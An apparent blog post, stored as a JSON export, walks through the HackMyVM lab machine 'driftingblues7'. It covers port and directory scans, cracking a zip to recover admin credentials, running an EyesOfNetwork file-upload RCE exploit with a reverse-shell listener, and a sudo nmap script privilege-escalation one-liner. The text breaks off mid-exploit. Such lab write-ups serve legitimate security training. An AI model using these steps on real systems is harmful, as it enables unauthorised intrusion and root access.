{"id":538,"date":"2024-04-12T18:10:57","date_gmt":"2024-04-12T10:10:57","guid":{"rendered":"http:\/\/162.14.82.114\/?p=538"},"modified":"2024-04-13T13:44:06","modified_gmt":"2024-04-13T05:44:06","slug":"hmv-_-driftingblues7","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/538\/04\/12\/2024\/","title":{"rendered":"hmv[-_-]driftingblues7"},"content":{"rendered":"<h1>driftingblues7<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412163839320\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412163937027\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.6:22\nOpen 172.20.10.6:66\nOpen 172.20.10.6:80\nOpen 172.20.10.6:111\nOpen 172.20.10.6:443\nOpen 172.20.10.6:2403\nOpen 172.20.10.6:3306\nOpen 172.20.10.6:8086\n\nPORT     STATE SERVICE         REASON  VERSION\n22\/tcp   open  ssh             syn-ack OpenSSH 7.4 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzkjX2w5j13avv0y4M6JB6Cz37Ul\/T8n3zMamPEhDo+Kvc9tY7uwllHOVigb9rMtwCAffFu0zBGhKY5ph5n1MRkYyS68OLmDGuj2UWzKd3ZY+ETgOw0dx01GiNvV0pd3nJnaPBS+XflsK2uht9NAU9MXfjjXLqL4vtbu7cplFy6BaGFxU0EstzPFQ2zQI8BCmQUUHC21XOVgrUB4xvYs\/1XpxRYPvIjGJWzMFKTwXvWC1F0rcMvhk\/UpymNjfqWP2TbZnfpgf4xDiEqK+4UEbK9hwFpufkDCNArS6zjJwGRWQsoZewtFy1Yobyu4Tcb\/eB3zZziLVDbW+bjxiQiszP\n|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFPdaFSwiPtfU8tWyo5LipFZ+3VqLP5Bh9vTXTg8F6tbvXw\/MxeBDVYT4ixLfX2y+AODzyrGWZdz1Dey2JAwzm0=\n|   256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAjhGjsuyeF1S+XQ0uTCoDgO0RC4kNabc0kxds+gzO4l\n66\/tcp   open  http            syn-ack SimpleHTTPServer 0.6 (Python 2.7.5)\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-server-header: SimpleHTTP\/0.6 Python\/2.7.5\n|_http-title: Scalable Cost Effective Cloud Storage for Developers\n80\/tcp   open  http            syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3)\n|_http-title: Did not follow redirect to https:\/\/172.20.10.6\/\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 
Perl\/v5.16.3\n111\/tcp  open  rpcbind         syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|_  100000  3,4          111\/udp6  rpcbind\n443\/tcp  open  ssl\/http        syn-ack Apache httpd 2.4.6 ((CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3)\n|_http-server-header: Apache\/2.4.6 (CentOS) OpenSSL\/1.0.2k-fips mod_fcgid\/2.3.9 PHP\/5.4.16 mod_perl\/2.0.11 Perl\/v5.16.3\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/emailAddress=root@localhost\/organizationalUnitName=SomeOrganizationalUnit\/localityName=SomeCity\n| Issuer: commonName=localhost\/organizationName=SomeOrganization\/stateOrProvinceName=SomeState\/countryName=--\/emailAddress=root@localhost\/organizationalUnitName=SomeOrganizationalUnit\/localityName=SomeCity\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-03T14:37:22\n| Not valid after:  2022-04-03T14:37:22\n| MD5:   a0b3:3036:eb25:e23f:3eea:933d:13cd:af6a\n| SHA-1: bb62:831f:6882:89bf:dda2:52d6:d95a:6402:adbf:f0e9\n| -----BEGIN CERTIFICATE-----\n| MIID3jCCAsagAwIBAgICJsgwDQYJKoZIhvcNAQELBQAwgaMxCzAJBgNVBAYTAi0t\n| MRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQK\n| DBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxV\n| bml0MRIwEAYDVQQDDAlsb2NhbGhvc3QxHTAbBgkqhkiG9w0BCQEWDnJvb3RAbG9j\n| YWxob3N0MB4XDTIxMDQwMzE0MzcyMloXDTIyMDQwMzE0MzcyMlowgaMxCzAJBgNV\n| BAYTAi0tMRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkw\n| FwYDVQQKDBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0\n| aW9uYWxVbml0MRIwEAYDVQQDDAlsb2NhbGhvc3QxHTAbBgkqhkiG9w0BCQEWDnJv\n| 
b3RAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0EtI\n| b7FbZ3KGy3\/mbivJhLXQR+s9CNK4\/z5akN4U1tfAw1djq8vcCOlCxXxAebFQVqeL\n| 7Rwo9hvHWDE1rtNcSQ8PgJrIcYGTiNUxFJR5qkOvvB+sbVEsLcpJ6JSg6tIYEUXK\n| KLUC5vgB4YtflaxFt1anZ6w6mDPcBGD82D3euO61fAUUDiF336X+rsPG2YsyMC4K\n| vUNofnhfnHYh1oZjBB7Bcj9uRn7Dd07mlyWfx2\/2ym0idQ2KqGB5akps2V\/0u20H\n| k0y\/S2wFXGfz\/zgbldpzzOKdk3aaf102SVWv8zaW1lSM3+\/JSx1e7pJVbbdpDcee\n| pHq1bnm\/zJlSKaVqUwIDAQABoxowGDAJBgNVHRMEAjAAMAsGA1UdDwQEAwIF4DAN\n| BgkqhkiG9w0BAQsFAAOCAQEARFSwvH0GEHZeS7kNbP6oTEYTIWBzt0l\/V9EUnN44\n| ZKNWfIWWzcGAsTuMwO3b7HfHs9RK0mZhNGjZ+voe+uiuhndP4Ao0rwIpLHVLvG1u\n| WYGlJ0ZB0Jsf8E3022SXXBhZseMGF5VonFHXXTnR3a+Cu5IjubScEwBg0YvosQE5\n| n5Do9pVdm58yuA+YUQfe5OsiR\/hGS9Zu76mPlaEJQymUqeFNSt1AVksGf7NIa833\n| 5+\/8GyqIwLEUZmEZ6Gjg9\/yj6Uybe5Ply87PgGPWHdz1luO8wGpL1uXcAlafbaIt\n| NgmTYuExR9j0gO7WUz5JB1jn1ansflsAjCo71BxCIwM99A==\n|_-----END CERTIFICATE-----\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n| http-title: EyesOfNetwork\n|_Requested resource was \/login.php##\n2403\/tcp open  taskmaster2000? syn-ack\n3306\/tcp open  mysql           syn-ack MariaDB (unauthorized)\n8086\/tcp open  http            syn-ack InfluxDB http admin 1.7.9\n|_http-title: Site doesn&#039;t have a title (text\/plain; charset=utf-8)<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">Error: the server returns a status code that matches the provided options for non existing urls. http:\/\/172.20.10.6\/04926594-380d-4b1f-8247-e871066f63b4 =&gt; 302 (Length: 240). 
To continue please exclude the status code or the length<\/code><\/pre>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6:66\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.6:66\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              png,php,zip,git,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/user.txt             (Status: 200) [Size: 32]\n\/root.txt             (Status: 200) [Size: 32]\n\/index_files          (Status: 301) [Size: 0] [--&gt; \/index_files\/]<\/code><\/pre>\n<p>Partway through the scan, a serious problem showed up:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810215.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170311181\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I restarted the target and scanned again, and it still shut down as soon as the port scan finished.... Hmm... let's try a different tool:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ sudo dirsearch -u http:\/\/172.20.10.3:66 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt 2&gt;\/dev\/null\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 220545\nOutput File: \/home\/kali\/temp\/driftingblues7\/reports\/http_172.20.10.3_66\/_24-04-13_01-25-50.txt\nTarget: http:\/\/172.20.10.3:66\/\n[01:25:50] Starting: \n[01:25:58] 301 -    0B  - \/index_files  -&gt;  \/index_files\/\n[01:32:21] 200 -  248B  - \/eon\nTask Completed<\/code><\/pre>\n<p>Does this count as the two tools complementing each other, hahaha.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240412164301051\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810217.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412164314626\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Accessing Sensitive Paths<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/\/user.txt<\/code><\/pre>\n<pre><code class=\"language-text\">AED508ABE3D1D1303E1C1BC5F1C1BA2B<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/root.txt<\/code><\/pre>\n<pre><code class=\"language-text\">BD221F968ACB7E069FC7DDE713995C77<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810218.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810218.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412164850543\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6:66\/eon<\/code><\/pre>\n<pre><code class=\"language-text\">UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUU\nRw+5YmOf9bS11scvmFBLAQI\/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAA\nAABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEA\nAQBbAAAARgAAAAAA<\/code><\/pre>\n<p>Let's try decoding it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810219.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412165517903\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810220.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810220.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412165632934\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>It is a compressed archive....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810221.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810221.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170049687\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>Pick any online tool to convert it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810222.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810222.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170029896\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>It is password-protected, so let's try brute-forcing it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ ls -la                                                         \ntotal 
12\ndrwxr-xr-x  2 kali kali 4096 Apr 12 05:05 .\ndrwxr-xr-x 29 kali kali 4096 Apr 12 04:39 ..\n-rw-r--r--  1 kali kali  183 Apr 12 05:05 eon.zip\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ fcrackzip -D -u -p \/usr\/share\/wordlists\/rockyou.txt eon.zip    \n\nPASSWORD FOUND!!!!: pw == killah<\/code><\/pre>\n<p>Got the password!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ unzip eon.zip    \nArchive:  eon.zip\n[eon.zip] creds.txt password: \n extracting: creds.txt               \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ cat creds.txt \nadmin\nisitreal31__<\/code><\/pre>\n<h3>Logging in to the Management System<\/h3>\n<p>Try logging in:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810223.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810223.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170855359\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810224.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810224.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412170937770\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810225.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810225.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412171118670\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Exploitation<\/h3>\n<p>Search to see whether there are any related vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810226.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810226.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412171213734\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>There is a remote code execution vulnerability, so let's try exploiting it:<\/p>\n<pre><code class=\"language-bash\">searchsploit eyesofnetwork\nsearchsploit -m multiple\/webapps\/49432.sh\ncat 49432.sh\n.\/49432.sh\n                 ,*-.\n                 |  |\n             ,.  |  |\n             | |_|  | ,.\n             `---.  |_| |\n                 |  .--`\n                 |  |\n                 |  |\n\u03a9\n ! DO NOT USE IF YOU DONT HAVE PERSMISSION !\n\n         EyesOfNetwork 5.3-10\n\n             RedTeam Tool\n\n       Input verification desertion\n\n       RCE via Arbitrary FileUpload\n\nEyesOfNetwork IP :\n172.20.10.4\nHackerIP (used to start the listener) :\n172.20.10.8\nHacker PORT (used to start the listener):\n1234\nUsername (default = admin) :\nadmin\npassword :\nisitreal31__\ngetting sessionID ... \nsessionID acquired : \n\n When the Reverse-Shell is etablished, you can PrivEsc with : \necho &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; \/tmp\/nmap.script\nsudo nmap --script=\/tmp\/nmap.script\n ... I Know ...  
